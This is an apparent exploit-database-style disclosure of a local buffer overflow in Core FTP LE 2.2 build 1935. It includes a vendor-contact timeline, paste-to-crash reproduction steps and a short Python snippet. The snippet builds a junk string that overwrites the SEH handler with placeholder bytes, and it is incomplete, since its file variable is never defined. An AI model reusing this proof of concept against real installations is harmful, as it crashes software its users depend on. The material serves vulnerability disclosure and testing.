Core FTP LE version 2.2 build 1935 suffers from buffer overflow vulnerability.
# Exploit Title: Core FTP LE Version 2.2, build 1935 - Local Buffer
Overflow (SEH Unicode)
# Vulnerability Details: Core FTP LE Version 2.2, build 1935 is prone to a
buffer overflow vulnerability that may result in a DoS user local folder
selection pane
# Exploit Type : DOS
# Date: 08-Sep-2019
# Vulnerable Software: Core FTP LE
# Version: Version 2.2, build 1935
# Vendor Homepage:
# Software Link:
# Tested Windows : Windows Vista Ultimate SP2(32-bit), Windows 7
Professional SP1(32-bit)
# Exploit Author: Debashis Pal
# Vulnerability Discover Date: 01-Sep-2019
# Vulnerability Report to Vendor:01-Sep-2019,No responds
# Again email to Vendor:05-Sep-2019 ,No responds
# Public Disclose : 08-Sep-2019
# PoC
# 1. coreftpleversion2-2build1935.txt from code, open in
notepad(coreftpleversion2-2build1935.txt), copy contents
# 2. Open Core FTP LE(Version 2.2, build 1935)
# 3. Select the left interface(CORE FTP LE,local folder selection pane)
# 4. paste contents from notepad
# 5. Application will crash and SEH overwritten with Unicode
crash = "\x43" * 585 #Junk
crash += "\x42" * 2 #nSEH
crash += "\x41" * 2 #SEH
crash += "\x44" * 411 #More Junk
generate=open(file, "w")
#Attachment: Application will crash and SEH overwritten with Unicode.jpg
Thank you,
Debashis Pal